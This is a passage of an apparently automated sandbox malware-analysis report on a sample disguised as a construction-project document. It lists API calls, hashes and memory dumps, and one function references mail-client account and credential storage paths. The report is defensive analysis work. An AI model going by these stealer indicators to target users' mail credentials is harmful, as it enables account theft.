                                                                                                                            • Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                            • Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 64603807-0
                                                                                                                          • Opcode ID: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction ID: 8d03524e730972d0d2727a111309b29fb4c1dd807b4b6f2d90347fc94b995f65
                                                                                                                          • Opcode Fuzzy Hash: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction Fuzzy Hash: A5215C72C00118BFDF11AFA4CE89CAE7E79EF08364B14463AF514762E0C6795E419BA9
                                                                                                                          Function 00405234 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                                                                                          • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                                                                                          • Opcode Fuzzy Hash: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                                                                                          • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8
                                                                                                                          Function 332B925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B9221: _free.LIBCMT ref: 332B924A
                                                                                                                          • _free.LIBCMT ref: 332B92AB
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B92B6
                                                                                                                          • _free.LIBCMT ref: 332B92C1
                                                                                                                          • _free.LIBCMT ref: 332B9315
                                                                                                                          • _free.LIBCMT ref: 332B9320
                                                                                                                          • _free.LIBCMT ref: 332B932B
                                                                                                                          • _free.LIBCMT ref: 332B9336
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                          • Instruction ID: f1ed1c88dcbafbd50d4316eb584ab93efc7bc975aff00f7f78ccdd3a204f594a
                                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                          • Instruction Fuzzy Hash: 95117F71E40B08EEDE60ABB1DC45FCB7BBD9F04780F408824E6D97A852DAB4B5C45651
                                                                                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                                                                                          • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                                                                                          • Opcode Fuzzy Hash: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                                                                                          • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                                                                                          Function 00404AFE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                                          • GetMessagePos.USER32 ref: 00404B21
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                                                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                                                                                          • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                                                                                          Function 332B8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,332B6FFD,00000000,?,?,?,332B8A72,?,?,00000100), ref: 332B887B
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,332B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 332B8901
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 332B89FB
                                                                                                                          • __freea.LIBCMT ref: 332B8A08
                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          • __freea.LIBCMT ref: 332B8A11
                                                                                                                          • __freea.LIBCMT ref: 332B8A36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1414292761-0
                                                                                                                          • Opcode ID: 09a52f009cd1fe51dfbf2a2f428e007e52d4d55fce3e296ec719b36f18bbec74
                                                                                                                          • Instruction ID: 148399bc763030f154bdbd8df7dd12447a671b1c6904d39df4ee6883ebcc0dcf
                                                                                                                          • Opcode Fuzzy Hash: 09a52f009cd1fe51dfbf2a2f428e007e52d4d55fce3e296ec719b36f18bbec74
                                                                                                                          • Instruction Fuzzy Hash: CB51B172A1029AEFEF158E64CC41EAB77BAEB447D1F154629FD08E6140EB74D8D08690
                                                                                                                          Function 332B1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 332B1038
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 332B104B
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 332B1061
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 332B1075
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 332B1090
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 332B10B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3594823470-0
                                                                                                                          • Opcode ID: 5f9b6d82647b83bbbed674bf059a3bbc608254972f540497bf41163dfb222b6e
                                                                                                                          • Instruction ID: 78b23d1ba055f10a875feb6f3da4daea1e112d9b62d99643968ce1e447668967
                                                                                                                          • Opcode Fuzzy Hash: 5f9b6d82647b83bbbed674bf059a3bbc608254972f540497bf41163dfb222b6e
                                                                                                                          • Instruction Fuzzy Hash: BA217F76D003199BCF109E61DC48EDB3779EF443A4F108696E86A971A1DA70AAC6CB80
                                                                                                                          Function 332B3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,332B3518,332B23F1,332B1F17), ref: 332B3864
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 332B3872
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 332B388B
                                                                                                                          • SetLastError.KERNEL32(00000000,?,332B3518,332B23F1,332B1F17), ref: 332B38DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 22cae6c85e589967802877d8e397d6658e94add2e9b5a3f489b7eb89686e6e0b
                                                                                                                          • Instruction ID: 67c34cf143c573b593e776e90ca3037337ae6ce3f29a8bd16bed8924d48d16fe
                                                                                                                          • Opcode Fuzzy Hash: 22cae6c85e589967802877d8e397d6658e94add2e9b5a3f489b7eb89686e6e0b
                                                                                                                          • Instruction Fuzzy Hash: D401D437A087126EFE042979BCC8D962FB9EF057F57204339E320A94D0EFE248829341
                                                                                                                          Function 332B5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,332B6C6C), ref: 332B5AFA
                                                                                                                          • _free.LIBCMT ref: 332B5B2D
                                                                                                                          • _free.LIBCMT ref: 332B5B55
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,332B6C6C), ref: 332B5B62
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,332B6C6C), ref: 332B5B6E
                                                                                                                          • _abort.LIBCMT ref: 332B5B74
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3160817290-0
                                                                                                                          • Opcode ID: b0c44ab11b682e29374cafd94b5d98dfcf682ade9f7a4b6f5ad565edf2f6f9bb
                                                                                                                          • Instruction ID: 4f10059b20369b4587b6f114ebe763a3fb4695b1062c6f0a6557b996a0b18d00
                                                                                                                          • Opcode Fuzzy Hash: b0c44ab11b682e29374cafd94b5d98dfcf682ade9f7a4b6f5ad565edf2f6f9bb
                                                                                                                          • Instruction Fuzzy Hash: 7AF0CD7A9047016FEE422634AC48E4E2FBA9FC5AF1B384514F914AE584FE7484C34164
                                                                                                                          Function 332B11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,?,?,?,332B10DF,?,?,?,00000000), ref: 332B1E9A
                                                                                                                            • Part of subcall function 332B1E89: lstrcatW.KERNEL32(?,?,?,332B10DF,?,?,?,00000000), ref: 332B1EAC
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EB3
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EC8
                                                                                                                            • Part of subcall function 332B1E89: lstrcatW.KERNEL32(?,332B10DF,?,332B10DF,?,?,?,00000000), ref: 332B1ED3
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 332B122A
                                                                                                                            • Part of subcall function 332B173A: _strlen.LIBCMT ref: 332B1855
                                                                                                                            • Part of subcall function 332B173A: _strlen.LIBCMT ref: 332B1869
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                          • Opcode ID: cb6494070e23ce397d91c067a99e8381520c2cd887f92737c56b66f577855c26
                                                                                                                          • Instruction ID: 68add499ea5ef04b455d95ea04424554fc12df7bd699624d6164a30fb947c008
                                                                                                                          • Opcode Fuzzy Hash: cb6494070e23ce397d91c067a99e8381520c2cd887f92737c56b66f577855c26
                                                                                                                          • Instruction Fuzzy Hash: 60218FB9E103586AEB1096A0EC82BEE7339EF80754F000556F605EB1D0E6B16DC18B99
                                                                                                                          Function 004049F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                          • wsprintfW.USER32 ref: 00404A9A
                                                                                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$&B
                                                                                                                          • API String ID: 3540041739-2907463167
                                                                                                                          • Opcode ID: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                                                                                          • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                                                                                          • Opcode Fuzzy Hash: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                                                                                          • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                                                                                          Function 00406220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406283
                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406297
                                                                                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 004062AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: *?|<>/":
                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                          • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                                          • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                                                                                          • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                                          • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                                                                                          Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                                                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
